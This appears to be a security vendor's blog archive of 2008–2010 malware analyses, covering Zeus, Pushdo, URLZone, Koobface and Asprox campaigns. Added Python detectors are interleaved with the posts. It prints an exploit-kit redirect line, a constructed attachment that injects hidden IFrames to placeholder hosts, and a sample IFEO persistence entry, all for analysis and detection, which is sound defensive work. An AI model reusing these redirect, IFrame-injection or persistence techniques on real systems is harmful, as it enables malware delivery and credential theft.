Archive for the ‘Malware’ Category


Don’t Pay Your Taxes

By Gavin Neale  •  December 5th, 2010  •   Malware

Or at least try to ensure that your money doesn’t end up in the hands of criminals using the Zeus crimeware kit, which could happen if you fall for this latest malicious email campaign targeting taxpayers. The emails are being sent from one of the Pushdo/Cutwail botnets and the campaign is very similar to the EFTPS one we previously blogged about. The main difference is the use of legitimate hacked websites and a range of exploits targeting vulnerabilities in client-side software such as Java and Adobe PDF readers.

The malicious email claims that your tax payment has been rejected and provides a link for you to check your information:

The link in the email, which appears to go to eftps.gov, actually goes to one of many web pages which have been uploaded to hacked web servers. The pages contain the obfuscated JavaScript shown below:

All of this script has the effect of adding just one new line of JavaScript to the current page: location.replace("http://[removed]autocom.ru/trafflit.php"). This call sends the browser to a new URL hosting the SEO exploit kit, which serves the JavaScript shown below.

This JavaScript determines whether Java (Oracle Java, not JavaScript) is enabled and then redirects the browser again, this time to the page rotator.php on the same server. Rotator.php contains exploits for four Java vulnerabilities and prompts you to download and open the file asshole.pdf. This PDF file, when opened in Adobe Reader, attempts to detect the Reader version and then launches an appropriate exploit if the detected version is known to be vulnerable.

The end goal of all these redirects and exploits is to install the notorious Zeus crimeware bot onto the victim’s machine. This is the VirusTotal report for the Zeus sample we collected. Zeus is well known for helping criminals steal login credentials as victims browse their online bank accounts, and for transferring money into accounts under the criminals’ control.


Click Fraud from Drooptroop

By Gavin Neale  •  August 30th, 2010  •   Malware

Advertising networks pay affiliates, usually website operators, for each click on an advertisement that the affiliate has displayed on their website. Click fraud is where affiliates have no intention of waiting for people to visit their website; instead they fraudulently send imitation clicks to the ad network, often using automated scripts or botnets to quickly generate a profit. We recently took a look at Drooptroop, a Trojan horse designed to intercept browser requests for search results and send an imitation ad click to an advertising network, which in turn directs the browser to a website as if the user had actually clicked on that ad.

Drooptroop modifies Windows network functions loaded by the browser so that they point to Drooptroop’s own routines, where it can intercept and modify the browser’s internet traffic. The malware then waits for the user to do a search using one of several popular search engines, including Google, Yahoo, Bing or Altavista. When the user clicks on one of the search results, Drooptroop sends a simulated click on an advert to an advertising network and redirects the browser to a web page chosen by that advertising network.

During the time we were observing it, Drooptroop served ads from the advertising networks 7Search.com and relestar.com as well as fake Anti-Virus websites designed to scare users into downloading and eventually buying fake AV products.

On a machine infected with Drooptroop, we did a Google search for ‘Click fraud’ and got the usual results page:


GootKit – Automated Website Infection

By Gavin Neale  •  June 30th, 2010  •   Malware

Each day, when we review our spam feeds, we see links to hundreds of hacked or compromised websites that are used to serve as hosts for spam content, such as images, redirect scripts or malicious IFrames. Often these websites have had code appended to the end of each file or have had new HTML or PHP files uploaded to them. For example, here is a spam email sent by the Pushdo botnet. Three of the four links in this email lead to the same compromised website.

Below are two common examples of files that have been uploaded to compromised websites.


Pushdo uses World Cup Theme to Spread Malware

By Gavin Neale  •  June 15th, 2010  •   Malware

Over the last couple of days we have been seeing numerous malicious and Canadian Pharmacy spam campaigns sent from the Pushdo botnet. This campaign features an HTML file as an attachment and some subject lines, including one that mentions the FIFA World Cup, that may fool unwary recipients. Some of the email subjects we have seen are:

  • FIFA World Cup South Africa… bad news
  • [Recipient Domain] account Information
  • [Random Email Address] has sent you a birthday ecard.
  • Reset your Twitter password

The HTML file attachment contains the following JavaScript:

We have seen several different variations of this script but all have the same purpose which is concealed by some very basic obfuscation. If we remove the parts of this script that aren’t doing anything and clean up some of the text we get the script below:

If this attachment was opened in a browser with JavaScript enabled then the script will redirect the browser to the file z.htm (shown below) on one of several different web servers.

This page waits for three seconds and then redirects the browser to a Canadian Pharmacy website. While waiting, a hidden IFrame is loaded. We have removed some of the obfuscation to make the script in this IFrame more readable:

This script checks each of the browser’s plugins to see if any contain the words ‘Adobe Acrobat’ or ‘Adobe PDF’ in their name. This is looking for any Adobe PDF readers and if one is found, adds an IFrame to the page pointing to a malicious PDF file.

The script then checks if Java (that’s Sun Microsystems’ Java, not JavaScript) is enabled, and if so, adds an IFrame that exploits vulnerabilities in Java.

The exploits install an executable named game.exe, which we have not yet analyzed and which is not detected by many anti-virus products.
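The attachment’s behaviour, as described above, is a fixed sequence: enumerate navigator.plugins looking for an Adobe PDF reader, test navigator.javaEnabled(), inject zero-size IFrames, and redirect after a timer. Those traits survive the light obfuscation the post mentions (string splitting, dead code), so a gateway can look for them directly. The scanner below is an added example, not the script from the post; its sample attachment is constructed and its IFrame targets are placeholder hosts.

```python
"""Scan an HTML attachment for the plugin-sniffing and redirect traits
described in the post. Added example, not the post's own script; the
sample attachment is constructed with placeholder hosts."""
import re

# Indicator name -> pattern applied to the normalised page text.
INDICATORS = {
    "plugin_enumeration": re.compile(r"navigator\.plugins", re.I),
    "pdf_reader_check": re.compile(r"Adobe\s*(Acrobat|PDF)", re.I),
    "java_check": re.compile(r"navigator\.javaEnabled\s*\(", re.I),
    "iframe_injection": re.compile(
        r"createElement\s*\(\s*['\"]iframe['\"]\s*\)|<iframe", re.I),
    "hidden_element": re.compile(
        r"(width|height)\s*[:=]\s*['\"]?0|visibility\s*:\s*hidden|display\s*:\s*none", re.I),
    "timed_redirect": re.compile(r"setTimeout[\s\S]{0,200}?location", re.I),
}


def normalise(text):
    """Undo the basic obfuscation the post mentions: re-join split string
    literals such as 'navi' + 'gator' and collapse whitespace."""
    text = re.sub(r"['\"]\s*\+\s*['\"]", "", text)
    return re.sub(r"\s+", " ", text)


def scan_attachment(html):
    """Return the sorted list of indicator names present in the content."""
    body = normalise(html)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(body))


def verdict(html):
    """A plugin or Java check combined with an injected frame is the
    pairing the post describes; rate that combination high."""
    found = set(scan_attachment(html))
    if "iframe_injection" in found and found & {"pdf_reader_check", "java_check"}:
        return "high"
    return "medium" if found else "clean"


# Constructed sample mimicking the structure described in the post.
SAMPLE_ATTACHMENT = """<html><body>
<script>
var p = navigator.plug' + 'ins;
for (var i = 0; i < p.length; i++) {
  if (p[i].name.indexOf('Adobe Acro' + 'bat') != -1 || p[i].name.indexOf('Adobe PDF') != -1) {
    var f = document.createElement('iframe');
    f.width = 0; f.height = 0;
    f.src = 'http://placeholder-host.invalid/pdf.php';
    document.body.appendChild(f);
  }
}
if (navigator.javaEnabled()) {
  document.write('<iframe src="http://placeholder-host.invalid/java.php" width=0 height=0></iframe>');
}
setTimeout(function () { location.href = 'http://placeholder-host.invalid/z.htm'; }, 3000);
</script>
</body></html>"""

BENIGN_PAGE = "<html><body><p>Your invoice is attached as a PDF.</p></body></html>"

if __name__ == "__main__":
    print(scan_attachment(SAMPLE_ATTACHMENT), verdict(SAMPLE_ATTACHMENT))
    print(scan_attachment(BENIGN_PAGE), verdict(BENIGN_PAGE))
```

The word "PDF" alone in the benign page does not trigger anything, because the indicators key on the API calls (navigator.plugins, javaEnabled) and on the Adobe plugin names rather than on generic words. Heavier obfuscation (eval of encoded strings, for instance) defeats this kind of static check, which is why the post pairs it with sandbox analysis of the resulting executable.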


iTunes Gift Certificate Malware

By Rodel Mendrez  •  May 13th, 2010  •   Malware

The Pushdo (Cutwail) spambot is a notorious scam machine which has recently been using a variety of social engineering themes and targets to push fake anti-virus, Bredolab and Zbot executables. One of Pushdo's latest themes is the online iTunes store which attempts to lure users to open a rich text format (RTF) file attachment claiming to be a "$50 iTunes Gift Certificate".

It seems a bit odd for the iTunes store to use a RTF document format for sending out iTunes gift certificates, and this alone should make most users suspicious. When we extracted the RTF file, we discovered an embedded executable that was a fake anti-virus installer.

Figure 1. Sample iTunes scam spam campaign

Opening the RTF document does not automatically run the executable file. Instead, it relies on social engineering to convince a potential victim to click the file, using the unsophisticated filename "CLICK HERE.exe".
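An RTF file carries embedded objects as hex-encoded \objdata groups, so a mail filter can decode those groups and look for a DOS/PE "MZ" header before the document ever reaches a user. The following is an added example, not the tooling used for the post; the RTF it builds is constructed, and its "executable" is only an MZ header followed by padding.

```python
"""Find embedded executables inside an RTF attachment. Added example,
not the post's own tooling; the sample RTF is constructed and its
payload is a fake executable (MZ header, no real code)."""
import re

# \objdata is followed by the object's bytes as hex digits, possibly
# broken across lines, until the closing brace of the group.
OBJDATA_RX = re.compile(r"\\objdata\b([0-9a-fA-F\s]+)")
MZ = b"MZ"
# A printable file name with an executable extension inside the OLE wrapper.
PRINTABLE_NAME_RX = re.compile(rb"[\x20-\x7e]{4,}\.(exe|scr|com|bat|pif)", re.I)


def extract_objects(rtf_text):
    """Return the raw bytes of every \\objdata group in the document."""
    blobs = []
    for m in OBJDATA_RX.finditer(rtf_text):
        hexdata = re.sub(r"\s+", "", m.group(1))
        if len(hexdata) % 2:
            hexdata = hexdata[:-1]  # tolerate a truncated trailing nibble
        blobs.append(bytes.fromhex(hexdata))
    return blobs


def find_embedded_executables(rtf_text):
    """Report each object that contains an 'MZ' header, with the file
    name the object advertises (if any) and the header's offset."""
    findings = []
    for idx, blob in enumerate(extract_objects(rtf_text)):
        mz_at = blob.find(MZ)
        if mz_at == -1:
            continue
        name = PRINTABLE_NAME_RX.search(blob[:mz_at])
        findings.append({
            "object": idx,
            "mz_offset": mz_at,
            "name": name.group(0).decode("ascii") if name else None,
        })
    return findings


def build_sample_rtf():
    """Constructed RTF: a harmless paragraph plus one embedded object
    whose payload is a fake executable named like the one in the post."""
    payload = (b"\x01\x05\x00\x00\x02\x00\x00\x00"   # constructed OLE-style prefix
               + b"CLICK HERE.exe\x00"
               + b"MZ\x90\x00" + b"\x00" * 28)
    return ("{\\rtf1\\ansi\\pard Your $50 iTunes Gift Certificate\\par "
            "{\\object\\objemb{\\*\\objdata " + payload.hex() + "}}}")


if __name__ == "__main__":
    for finding in find_embedded_executables(build_sample_rtf()):
        print(f"object {finding['object']}: {finding['name']} (MZ at byte {finding['mz_offset']})")
```

Real OLE packages wrap the file in a longer header than the constructed one here, and a determined sender can compress or split the payload, so this check belongs in front of, not instead of, sandbox detonation. A document with no \objdata group at all yields an empty list.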

It pays not to get too excited with free stuff like this because opening a "$50 iTunes Gift Certificate" attachment could force you to pay $50 for bogus anti-virus software, not to mention placing your credit card information at risk.

MailMarshal Customers are protected from these campaigns with SpamCensor 443.


Malware Analysis – Trojan Banker URLZone/Bebloh

By Daniel Chechik  •  September 30th, 2009  •   Malware

In our recent Cybercrime Intelligence report, we described a cybercriminal process of robbing money from bank accounts, using money mules and Trojans.

In this blog post, we will provide you with more technical aspects about the Trojan Banker URLZone/Bebloh that they used.

URLZone is a Trojan kit that lets the attacker use the “URLZone Builder” to create a configuration file. This file contains precise orders to the bot, enabling the attacker to target any bank he wants (we described in the Cybercrime Intelligence report how the bot activates the account). URLZone successfully managed to bypass the “One Time Password” protection used by German banks. This is a technique that gives the user a new password every time he logs into his account; its goal is to make the theft of usernames and passwords worthless. To succeed, the malware must execute inside the browser so that it can change the transaction parameters and fool the user into approving a fraudulent money transfer from his account.

Let’s now take a step-by-step look at how the Trojan operates.

Once the malware is executed, it copies itself to c:\uninstall02.exe. It then creates an ID and sends it with the version ID of the malware to the Command & Control (C&C) in order to confirm that the infected machine now contains the latest version of the malware.

The C&C logs the information and writes it to REQ[x].txt:
10:57:38 2009-09-24 GMT *****User ID**** ****IP****** 200908291825

Once the new executable is downloaded, it is copied to SYSTEM32 under a random name, with the hidden attribute set and a timestamp matching the operating system files.

Following is a screenshot of Virus Total scan results (2/41) for the latest generated malware:

It is important to mention URLZone (just like Zeus/Zbot and others) cannot operate on its own, since it is just a bot that is hooked into system processes and hides itself. The logic part of the malware is found in the configuration file – in our case INJECT file. The next step of the malware is downloading the configuration file.

Snippet code of the obfuscated configuration file:

The newly generated configuration file is stored locally and is encrypted.

The malware itself doesn’t change any system files. In order to keep working after the victimized machine’s restart, it adds itself to the startup registry.

The malware sets itself as the “Debugger” value for the file “userinit.exe”. This ensures that every time “userinit.exe” runs, the malware will run instead.
The malware hooks itself into the “svchost.exe” process and checks the C&C server every 3 hours for new commands and updates. Behind the scenes, the malware checks every second whether a new instance of one of the following applications has been executed:

  • myie.exe
  • iexplore.exe
  • firefox.exe
  • mozilla.exe
  • avant.exe
  • maxthon.exe
  • thebat.exe
  • explorer.exe

Once the malware recognizes that one of the above has been created, it hooks into it. The basic target of the malware (even without the configuration file) is to collect any credentials submitted by the user over HTTPS.
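The “Debugger” value the malware plants for userinit.exe lives under the Image File Execution Options key, which Windows consults whenever an image of that name starts; any Debugger entry for a logon binary is a red flag, and an entry pointing at something other than a real debugger deserves a look for any image. The audit below is an added example, not the post's tooling: it parses a .reg-style export (the text below is constructed; on a real host you would export the IFEO key with reg.exe and feed that text in) and reports the suspicious entries.

```python
"""Audit an exported registry fragment for IFEO 'Debugger' persistence,
the trick URLZone uses against userinit.exe. Added example, not the
post's own tooling; the .reg text below is constructed."""
import re

IFEO_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT"
            r"\CurrentVersion\Image File Execution Options")
# Debuggers that commonly and legitimately appear in IFEO on developer boxes.
KNOWN_DEBUGGERS = ("ntsd.exe", "windbg.exe", "vsjitdebugger.exe", "drwtsn32.exe")
# Binaries started at logon: any IFEO debugger here is suspicious.
HIGH_VALUE_TARGETS = ("userinit.exe", "winlogon.exe", "explorer.exe")


def _unescape_reg_sz(raw):
    """Strip the outer quotes of a .reg REG_SZ literal and undo \\ and \" escapes."""
    raw = raw.strip()
    if raw.startswith('"') and raw.endswith('"'):
        raw = raw[1:-1]
    return re.sub(r'\\(["\\])', r'\1', raw)


def parse_reg_export(text):
    """Parse [key] and "name"=value lines into {key: {name: value}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current and line.startswith('"') and "=" in line:
            name, _, value = line.partition("=")
            keys[current][name.strip('"')] = _unescape_reg_sz(value)
    return keys


def _debugger_exe(cmdline):
    """File name of the program a Debugger command line launches."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        path = cmdline[1:cmdline.find('"', 1)]
    else:
        path = cmdline.split()[0]
    return path.rsplit("\\", 1)[-1].lower()


def suspicious_ifeo_debuggers(reg_text):
    """Return (image, debugger, reason) for every IFEO Debugger entry
    that hijacks a logon binary or points at an unknown program."""
    findings = []
    for key, values in parse_reg_export(reg_text).items():
        if not key.lower().startswith(IFEO_KEY.lower() + "\\"):
            continue
        image = key.rsplit("\\", 1)[1].lower()
        debugger = values.get("Debugger")
        if not debugger:
            continue
        if image in HIGH_VALUE_TARGETS:
            findings.append((image, debugger, "logon binary hijacked"))
        elif _debugger_exe(debugger) not in KNOWN_DEBUGGERS:
            findings.append((image, debugger, "unknown debugger"))
    return findings


# Constructed export: one legitimate WinDbg entry, one URLZone-style hijack
# (the random file name under system32 is a placeholder).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="\"C:\\Program Files\\Debugging Tools\\windbg.exe\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\userinit.exe]
"Debugger"="C:\\WINDOWS\\system32\\placeholder-random-name.exe"
'''

if __name__ == "__main__":
    for image, debugger, reason in suspicious_ifeo_debuggers(SAMPLE_REG):
        print(f"{image}: {reason} -> {debugger}")
```

The notepad.exe entry is ignored because it launches a known debugger; the userinit.exe entry is reported regardless of what it points at, since nothing should be debugging the logon process on a production workstation.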

In case you wonder why the malware doesn’t collect the credentials from all websites (even though they use HTTPS), the answer is simple: the malware uses techniques to evade security appliances. It limits itself to collecting data that the user sends with the POST method in requests of less than 2,000 bytes, as shown below:

So far the malware behavior is similar to many other Trojans. However, URLZone uses the delivered configuration file to manipulate the user. Once the user opens his browser, the malware decrypts the configuration file:

The decryption algorithm is pretty simple: every byte of the configuration file is XORed with 0xFF (applying the same loop to the result encrypts it again):
    res = ""
    for i in configuration_file:      # configuration_file holds the encrypted bytes as a string
        res += chr(255 ^ ord(i))      # XOR each byte with 0xFF

Snippet code of the de-obfuscated configuration file:

The configuration file contains several sections, one of them for postbank.de (we are able to follow the malware’s steps using the screenshots it takes from the victim’s machine and transmits to the C&C server):

The malware manages to hook in at the exact moment when the victim confirms his transaction. Once the user approves the transaction, the malware changes the details and sends them to the server.

According to the configuration file, we can see the following:

In order not to raise any suspicion, the malware verifies that the user will only see what he expects.

As can be seen in the screenshot above, the malware manipulates the statistics page of the user’s account, making it look like the transaction was completed as the user intended. However, if we take a look at the server-side reports, we see exactly how much money was actually transferred.

As can be seen from the server log above, the malware identifies that the user is limited to a maximum transfer of 2000 Euro (INET_LIMIT=2000), so it transferred 1900 Euro (AMOUNT=1900.00) to the money mule account stored in the DROPNAME variable.

The following screenshot shows the VirusTotal detection rate (5/41) for the latest version of the URLZone/Bebloh malware (29.9.09):
MD5: 27E8351A5B0BEA5EF15C6681007FDEE5

Posted By Daniel Chechik


Koobface malware distribution technique – automatic user account creation on FaceBook, Twitter, BlogSpot and others

By Daniel Chechik  •  August 11th, 2009  •   Cybercrime Malware

Koobface is a well-discussed computer worm that tries to infect users using social engineering attacks. Koobface mainly abuses popular social-networking websites such as Facebook, Twitter, Bebo and Myspace. 
In this post I’ll describe another, less discussed, distribution tactic of this malware: using SEO techniques. In this scenario, the malware automatically creates BlogSpot accounts and populates them with the latest news from the Google News feed. This means that the trap site contains up-to-date content containing some of the most popular search terms. 
 
The blog shown above is an example of such an account that was automatically created by Koobface. In addition to the news feed, the malware also adds a script that redirects the victim to a malicious website that tries to install the Trojan. 
Following is a code snippet of the malicious script: 
 
 
The user is redirected to a fake Facebook page:
http://mi[--REMOVED--]09.com/go/fb.php 
 
In order to see the video, the user is asked to “Upgrade” his Flash Player. Needless to say, any click on this page will dupe the user to download the malware… 
 
Once the malware is downloaded, it tries to create new accounts in various websites. To do that, it needs to overcome a security mechanism called CAPTCHA (“Completely Automated Public Turing test to tell Computers and Humans Apart”) that is present on many websites and is designed to prevent computer programs from performing certain sensitive actions such as creating new accounts.
Following are the actions performed by the malware:
 
 
The Koobface tactic for bypassing the CAPTCHA test is simple: it challenges its infected users with the test by presenting the window shown below. The user is prompted to enter the word(s) in the image or his machine will shut down. The CAPTCHA image is sent to the victim by the C&C server. 
 
The virus darkens the background and leaves the user no other option than to enter the code in the CAPTCHA within 3 minutes, or else, it claims, it will shut down his computer (we tested it: it doesn’t shut down the machine). 
Does this CAPTCHA look familiar? Let me give you a hint…. 
 
Indeed, the CAPTCHA picture shown above is taken from Twitter’s account creation form. Several other popular websites, such as Bebo, Gmail, and Blogger, are being abused in a similar manner. 
 
Here is another example. This time, the CAPTCHA is part of a Gmail account creation: 
 
Koobface, installed on the victim machine, gets a CAPTCHA challenge by Gmail: 
The virus sends the CAPTCHA to the C&C server: 
 
The process might take several seconds, depending on how fast the person on another infected machine enters the code from the CAPTCHA.
The malware keeps asking the C&C for the code, until it receives it:
 
 
Once the code is retrieved, the process continues and the new account is created: 
 
As can be seen in the Fiddler dump above, the malware used the code retrieved from the C&C to successfully create the Gmail account. I can even log into the account using the credentials above… 
 
The malware continues working and it is going to create its own blog post using the email it created. It is now going to open a blog on Blogger.com: 
 
Firstly, as can be seen in the Fiddler dump, it accesses:
http://news.google.com/?output=rss
The virus takes the latest news results from Google which will be used to create the blog post. 
Following that, it accesses Blogger.com to create a new blog post. 
 
 
Shown here is the blog post that the malware created just like the one we have seen at the beginning of this post. 
The cybercriminals use a webservice to collect some statistics. Below you can see the number of unique users who reached these pages in the last couple of days: 
 
 
As can be seen in the Referrer statistics above, the users are reaching the malware webpage from different websites, while each URL is using a different social engineering technique to trick the user. 
 
There is no doubt that the technique works: more than 150,000 users reached the malware webpage in just 2 days! 
Posted by Daniel Chechik


India’s Institute of Remote Sensing Government Website Compromised

By Anonymous  •  June 29th, 2009  •   Cybercrime Malware

In May, we reported about a website of the Government of India that was compromised and used for serving malicious code. 
Last week, we detected that another website of the Government of India, “iirs-nrsa.gov.in”, had been compromised by cybercriminals, who are using it as a malicious code distribution channel. In this case, the criminals injected a script into the website that adds an IFrame to the page. This IFrame redirects the website’s visitors to malicious content. 
 
Following is a code snippet of the malicious script injected to the website: 
 
The IFrame created by this script points to malicious content hosted on a server in Texas armed with the LuckySploit attack toolkit, about which we wrote earlier this year. Below is a screenshot taken from the admin panel of the exploit toolkit showing the referrer statistics (referrers are the sites leading the victim to the exploit server); the “iirs-nrsa.gov.in” entry is highlighted: 
 
As can be seen in the screenshot above, the attack toolkit had already infected 11,798 victims’ machines. 
A code snippet of the obfuscated exploit served by this toolkit: 
 
The exploit page was detected by only 4 out of 40 AV engines at Virus Total: 
 
We notified CERT India about this issue, trusting that the problem will be fixed soon. 
Posted by Golan Yosef


Malware and the rising sun website

By Moshe Basanchig  •  February 24th, 2009  •   Cybercrime Malware Vulnerabilities

We at Finjan always claim that malware has no boundaries, and national borders won’t prevent cybercriminals from infecting websites with their malware. To demonstrate, let us take a closer look at the following site which is ranked 41 in Japan (!) and 382 worldwide, according to Alexa: yaplog.jp 
 
As you can guess, this website was compromised and was found serving malware. Let’s look at this attack thoroughly. 
First and foremost, an HTML IFRAME element was injected into one of the pages of yaplog.jp: 
 
The embedded IFrame on this Japanese site points to an external webpage hosted in China, which we at MCRC are familiar with since July last year. But as old as it may be, it is still effective at infecting innocent visitors, especially those who run an outdated Operating System. 
The first thing the malicious page does is create an MDAC ActiveX object instance, which in turn creates a new XMLHTTP object instance. If this creation succeeds, it means that the browser in use is a vulnerable (unpatched) IE, so another page is included. The new page uses the MDAC vulnerability to push a Trojan to the client and execute it. 
This is the MDAC check: 
 
The included page is moderately obfuscated in order to increase its chances of avoiding signature-based scans, such as by Anti-Virus products. 
Had the MDAC check failed, other vulnerabilities would have been exploited, each in a new IFRAME that includes an obfuscated page. First comes IE’s VML renderer, whose buffer overflow was simple to exploit in order to execute malicious code on the client machine. This is followed by the latest, and very much talked about, IE data-binding vulnerability, which also enables the execution of malicious code. This exploit was added only recently and is known to be highly effective, as many browsers had not been patched yet. 
Next are attempts to use the previously vulnerable ANI (animated cursor) file type by instructing the browser to use a malicious ANI file for the mouse cursor. 
Last, but not least, an attempt is made to exploit a Yahoo! Messenger vulnerability. This vulnerability is another buffer overflow which allows remote code execution. 
Below is the code responsible for all of the exploits described above: 
 
All of those exploits are used for the same purpose: push a downloader Trojan to the client. Once that Trojan is executed, it pulls a second Trojan, which is capable of stealing user data. 
In order to make the attack more difficult to track, it uses a cookie as a client-side marker, ensuring that the malicious pages are served to a given visitor only once a day, and not more. 
We are happy to report that yaplog.jp removed the malicious code from their website. 
Posted by Moshe Basanchig


Short research of “in-the-cloud-service” and “unknown malware samples”

By Anonymous  •  July 3rd, 2008  •   Malware

It looks like the new AV buzzword “in-the-cloud service” has gathered momentum among Anti-Virus vendors.
On June 30, 2008 an interview with Trend Micro’s CEO was published on ZDNet.co.uk titled “Antivirus industry lied for 20 years”. It makes me wonder what is going to change in the 21st year. In the interview Trend Micro’s CEO unveiled the new vision of her company: moving to an “In the Cloud Service”, e.g. one that “throws all the unknown samples up into the cloud for deeper and faster pattern recognition”. What will happen if I’m offline…? 
Although I was very impressed with this new vision, it did sound a little vague to me, so I tried to clarify for myself what the meaning of “unknown samples” is. As far as I know, Anti-Virus blocks what it has seen before and holds a signature for. What is the advantage of the cloud for detecting malicious code that is unknown? I can understand that a cloud can indicate volume, but I am not sure about unknown malicious code. 
I would like to share with you the results of my short research on “unknown samples” and the “in-the-cloud service”.
During June 2008, a new round of mass SQL injection attacks started. The attack tool (aliased “Asprox”) has been around for a couple of years, but during the last year there has been a new rise in the number of attacks. An “in the wild” new round of this mass attack is not supposed to be considered “unknown” to security vendors, but let’s try to keep our optimistic spirit and not digress.
The attack is designed to search Google for .asp pages which contain various terms, and will then launch SQL injection attacks against the websites returned by the search. A script/Iframe will be injected into the compromised website: 
 
The injected script consisted of the following code: 
 
I sent the [b.js] script for a VirusTotal scan and got 10/33 AV products detecting the file as potential malware. Which is obviously a typical False Positive case, isn’t it? 
 
When I modified the script to point to another location of the malicious file [newhost.com.newfil.cgi], VirusTotal reported 6/33 AV products detecting the file as potential malware. Where did the other 4 disappear to? 
 
 
During June 2008, we detected more than 70 different domains hosting [b.js] and the location of the malicious file was unique to each and every one of them.
Following are the top malicious hosts with successful exploitation during the period of May 31 – June 30: 
 
Can it be that Anti-Virus products are now holding signatures for domains and URLs rather than trying to identify malicious code they have never inspected before? As my research found, just by changing the domain names, some AVs no longer flagged this code as malicious… surprisingly enough. 
As the [b.js] file points to a malicious file, which is the one I would expect security vendors to mark as dangerous, I submitted the actual malicious file to VirusTotal. This time half of the vendors detected it as potential malware, so it came out OK; we kept our optimistic spirit after all… 
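The drop from 10/33 to 6/33 verdicts after a change of host is what you get when a signature keys on the URL instead of on the loader itself. A detection that hashes the script after replacing every URL with a token and discarding whitespace survives that trick. The code below is an added example, not the research tooling behind the post; the two loader variants are constructed stand-ins with placeholder hosts, not the real [b.js].

```python
"""Domain-agnostic fingerprint for injected loader scripts. Added
example, not the post's own tooling; the two variants below are
constructed stand-ins with placeholder hosts."""
import hashlib
import re

URL_RX = re.compile(r"(https?:)?//[A-Za-z0-9.\-]+(?::\d+)?(/[^\s'\"<>]*)?", re.I)
WS_RX = re.compile(r"\s+")


def normalise_script(js):
    """Replace every URL with a token and drop all whitespace; what is
    left is the loader's structure, independent of where it is hosted."""
    return WS_RX.sub("", URL_RX.sub("<URL>", js))


def structural_hash(js):
    """SHA-256 of the normalised script: the same for every re-hosted copy."""
    return hashlib.sha256(normalise_script(js).encode()).hexdigest()


def exact_hash(js):
    """SHA-256 of the raw bytes: changes whenever the host changes."""
    return hashlib.sha256(js.encode()).hexdigest()


def same_family(js_a, js_b):
    """True when two scripts differ only in URLs and formatting."""
    return structural_hash(js_a) == structural_hash(js_b)


# Constructed loader variants: same logic, different host and path, and
# the second one re-minified, as an attacker rotating domains would do.
VARIANT_A = """var d = document;
if (d.cookie.indexOf("seen=1") == -1) {
  d.write('<iframe src="http://loader-host-a.invalid/cgi/newfile.cgi" width=0 height=0></iframe>');
  d.cookie = "seen=1";
}"""

VARIANT_B = """var d=document;
if(d.cookie.indexOf("seen=1")==-1){
 d.write('<iframe src="http://loader-host-b.invalid/x/newfil.cgi" width=0 height=0></iframe>');
 d.cookie="seen=1";
}"""

if __name__ == "__main__":
    print("exact hashes equal:     ", exact_hash(VARIANT_A) == exact_hash(VARIANT_B))
    print("structural hashes equal:", same_family(VARIANT_A, VARIANT_B))
```

A production signature would normalise further (variable names, string literals, numeric constants), but even this minimal step reduces the 70-plus domains the post counted to one fingerprint, which is the property a signature for a mass-injection campaign needs.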
 
This malicious file has been around for over a month now. Isn’t that enough time for security vendors to become familiar with a mass attack and write a signature for this file? Will an “in-the-cloud” service help to improve that? I’m not really sure. A different security technology needs to come to the rescue. 
Posted by Ayelet Heyman
